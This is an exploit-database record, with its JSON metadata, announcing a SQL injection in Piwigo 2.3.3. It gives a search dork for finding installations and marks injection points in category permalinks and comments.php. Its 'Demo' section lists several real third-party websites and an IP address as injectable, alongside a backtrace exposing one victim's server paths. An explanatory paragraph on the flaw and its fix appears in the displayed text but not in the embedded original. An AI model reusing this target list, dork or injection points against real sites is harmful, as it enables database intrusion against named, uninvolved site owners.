ID 1337DAY-ID-17618
Type zdt
Reporter TeaM MosTa
Modified 2012-03-04T00:00:00
Description
Exploit for php platform in category web applications
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : piwigo <== SQL Injector
# Date : 26-02-2012
# Author : TeaM MosTa
# Version : 2.3.3
# Dork : "Propulsé par Piwigo"
# Tested on : Windows 7 , BackTrack 5 (B-T.5)
# Greetz : milw0rm 1337day.com
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[ Exploit by TeaM MosTa ]--------------------------------------------------+
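Exploit
http://127.0.0.1/piwigo/index.php?/category/1" <===> {SQL}
comments.php?display_mode=albums <===> {SQL}
Backtrace printed by Piwigo's error handler, apparently for the category request (no trace is given for comments.php). Each frame names the called function and the file/line of the call: index.php includes section_init.inc.php, parse_section_url hands the category segment to get_cat_id_from_permalinks, and the query issued there through hash_from_query fails in pwg_query. The trace establishes that a quote in the URL segment breaks the statement built in the permalink lookup; the page gives no query text or returned data, so impact beyond the error is not demonstrated here. The fix belongs at that lookup: escape or bind the segment before it enters the query, and do not print backtraces with filesystem paths to visitors.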
#1 my_error /home/fanslyon/public_html/piwigo/include/functions.inc.php(637)
#2 pwg_query /home/fanslyon/public_html/piwigo/include/functions.inc.php(1275)
#3 hash_from_query /home/fanslyon/public_html/piwigo/include/functions_category.inc.php(393)
#4 get_cat_id_from_permalinks /home/fanslyon/public_html/piwigo/include/functions_url.inc.php(483)
#5 parse_section_url /home/fanslyon/public_html/piwigo/include/section_init.inc.php(123)
#6 include /home/fanslyon/public_html/piwigo/index.php(27)
Demo :
http://www.fanslyon.com/piwigo/index.php?/category/53' {SQL}
http://endlersman.paysages-aquatiques.com/archivphoto/piwigo/picture.php?/194/categories%22{SQL}
http://endlersman.paysages-aquatiques.com/archivphoto/piwigo/index.php?/category/53%27{SQL}
http://88.191.128.71/piwigo/piwigo/picture.php?/194/categories%22{SQL}
http://photos.ugtg.org/picture.php?/194/categories%22{SQL}
http://www.nature-granville-chausey.com/picture.php?/40/category/4%22
http://tedybear.fr/piwigo/index.php?/category/194%22
+----------------------------------------------------------------------------------------------------------------------------------+
TnKs To :
[# Ked Ans | 1337day.com Inj3ct0r Exploit DataBase | Original MosTa | TrOoN | HacKer_Fire |#]
[# Kàràm Eddiñé BiLàmi | security-ray | Exploit-Db | metasploit | backtrack| walid_rires|#]
[#Mail: [email protected] #]
# 0day.today [2018-03-13] #
{"hash": "9c2733ba7024fd94b952cc4f1171e6d0b9c54170e4b0ac25b400dfd547791745", "id": "1337DAY-ID-17618", "lastseen": "2018-03-13T20:34:53", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "6c262facc1690d39dcf1a5e9cb7838e7", "key": "href"}, {"hash": "4201ad882573576e5e06832818f17e75", "key": "modified"}, {"hash": "4201ad882573576e5e06832818f17e75", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "526505df8e6f34da06a8fc4663cc47c9", "key": "reporter"}, {"hash": "4297fa5388c931d92b6270a749d1a020", "key": "sourceData"}, {"hash": "0d02c6144056f922958510e5b3c74f10", "key": "sourceHref"}, {"hash": "111f52da444070b13b3e8191b0fc94e5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-03-13T20:34:53"}, "dependencies": {"references": [], "modified": "2018-03-13T20:34:53"}, "vulnersScore": 0.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17618", "description": "Exploit for php platform in category web applications", "title": "piwigo v.2.3.3 SQL Injector", "history": [{"bulletin": {"hash": "9b2ec6c2ac2fc66bd0deca092006deccb6726951a63c29652efc79137f513cfc", "id": "1337DAY-ID-17618", "lastseen": "2016-04-20T02:11:07", "enchantments": {"score": {"value": 6.0, "modified": "2016-04-20T02:11:07"}}, "hashmap": [{"hash": "6eed0eb1c16b97449578bf2270a84ae7", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "111f52da444070b13b3e8191b0fc94e5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": 
"d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4201ad882573576e5e06832818f17e75", "key": "modified"}, {"hash": "526505df8e6f34da06a8fc4663cc47c9", "key": "reporter"}, {"hash": "6b6d03a87e5013f4d8969be10bbf0f0a", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c5fcd40b928e6c4f96d126efdc63d1ca", "key": "sourceData"}, {"hash": "4201ad882573576e5e06832818f17e75", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/17618", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "piwigo v.2.3.3 SQL Injector", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "+--------------------------------------------------------------------------------------------------------------------------------+\r\n# Exploit Title : piwigo <== SQL Injector\r\n# Date : 26-02-2012\r\n# Author : TeaM MosTa\r\n# Version : 2.3.3\r\n# Dork : \"Propuls\u00e9 par Piwigo\"\r\n# Tested on : Window 7 , B-T.5\r\n# Greetz : milw0rm 1337day.com\r\n+--------------------------------------------------------------------------------------------------------------------------------+\r\n+------------------------------------------[ Exploit by TeaM MosTa ]--------------------------------------------------+\r\nExploit\r\nhttp://127.0.0.1/piwigo/index.php?/category/1\" <===> {SQL}\r\ncomments.php?display_mode=albums <===> {SQL}\r\n#1 my_error /home/fanslyon/public_html/piwigo/include/functions.inc.php(637)\r\n#2 pwg_query /home/fanslyon/public_html/piwigo/include/functions.inc.php(1275)\r\n#3 hash_from_query /home/fanslyon/public_html/piwigo/include/functions_category.inc.php(393)\r\n#4 get_cat_id_from_permalinks 
/home/fanslyon/public_html/piwigo/include/functions_url.inc.php(483)\r\n#5 parse_section_url /home/fanslyon/public_html/piwigo/include/section_init.inc.php(123)\r\n#6 include /home/fanslyon/public_html/piwigo/index.php(27)\r\nDemo :\r\nhttp://www.fanslyon.com/piwigo/index.php?/category/53' {SQL}\r\nhttp://endlersman.paysages-aquatiques.com/archivphoto/piwigo/picture.php?/194/categories%22{SQL}\r\nhttp://endlersman.paysages-aquatiques.com/archivphoto/piwigo/index.php?/category/53%27{SQL}\r\nhttp://88.191.128.71/piwigo/piwigo/picture.php?/194/categories%22{SQL}\r\nhttp://photos.ugtg.org/picture.php?/194/categories%22{SQL}\r\nhttp://www.nature-granville-chausey.com/picture.php?/40/category/4%22\r\nhttp://tedybear.fr/piwigo/index.php?/category/194%22\r\n\r\n+----------------------------------------------------------------------------------------------------------------------------------+\r\nTnKs To :\r\n[# Ked Ans | 1337day.com Inj3ct0r Exploit DataBase | Original MosTa | TrOoN | HacKer_Fire |#]\r\n[# K\u00e0r\u00e0m Eddi\u00f1\u00e9 BiL\u00e0mi | security-ray | Exploit-Db | metasploit | backtrack| walid_rires|#]\r\n[#Mail: team-mosta@hotmail.fr #]\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-03-04T00:00:00", "references": [], "reporter": "TeaM MosTa", "modified": "2012-03-04T00:00:00", "href": "http://0day.today/exploit/description/17618"}, "lastseen": "2016-04-20T02:11:07", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "+--------------------------------------------------------------------------------------------------------------------------------+\r\n# Exploit Title : piwigo <== SQL Injector\r\n# Date : 26-02-2012\r\n# Author : TeaM MosTa\r\n# Version : 2.3.3\r\n# Dork : \"Propuls\u00e9 par Piwigo\"\r\n# Tested on : Window 7 , B-T.5\r\n# Greetz : milw0rm 
1337day.com\r\n+--------------------------------------------------------------------------------------------------------------------------------+\r\n+------------------------------------------[ Exploit by TeaM MosTa ]--------------------------------------------------+\r\nExploit\r\nhttp://127.0.0.1/piwigo/index.php?/category/1\" <===> {SQL}\r\ncomments.php?display_mode=albums <===> {SQL}\r\n#1 my_error /home/fanslyon/public_html/piwigo/include/functions.inc.php(637)\r\n#2 pwg_query /home/fanslyon/public_html/piwigo/include/functions.inc.php(1275)\r\n#3 hash_from_query /home/fanslyon/public_html/piwigo/include/functions_category.inc.php(393)\r\n#4 get_cat_id_from_permalinks /home/fanslyon/public_html/piwigo/include/functions_url.inc.php(483)\r\n#5 parse_section_url /home/fanslyon/public_html/piwigo/include/section_init.inc.php(123)\r\n#6 include /home/fanslyon/public_html/piwigo/index.php(27)\r\nDemo :\r\nhttp://www.fanslyon.com/piwigo/index.php?/category/53' {SQL}\r\nhttp://endlersman.paysages-aquatiques.com/archivphoto/piwigo/picture.php?/194/categories%22{SQL}\r\nhttp://endlersman.paysages-aquatiques.com/archivphoto/piwigo/index.php?/category/53%27{SQL}\r\nhttp://88.191.128.71/piwigo/piwigo/picture.php?/194/categories%22{SQL}\r\nhttp://photos.ugtg.org/picture.php?/194/categories%22{SQL}\r\nhttp://www.nature-granville-chausey.com/picture.php?/40/category/4%22\r\nhttp://tedybear.fr/piwigo/index.php?/category/194%22\r\n\r\n+----------------------------------------------------------------------------------------------------------------------------------+\r\nTnKs To :\r\n[# Ked Ans | 1337day.com Inj3ct0r Exploit DataBase | Original MosTa | TrOoN | HacKer_Fire |#]\r\n[# K\u00e0r\u00e0m Eddi\u00f1\u00e9 BiL\u00e0mi | security-ray | Exploit-Db | metasploit | backtrack| walid_rires|#]\r\n[#Mail: [email\u00a0protected] #]\r\n\r\n\n\n# 0day.today [2018-03-13] #", "published": "2012-03-04T00:00:00", "references": [], "reporter": "TeaM MosTa", "modified": 
"2012-03-04T00:00:00", "href": "https://0day.today/exploit/description/17618"}
{}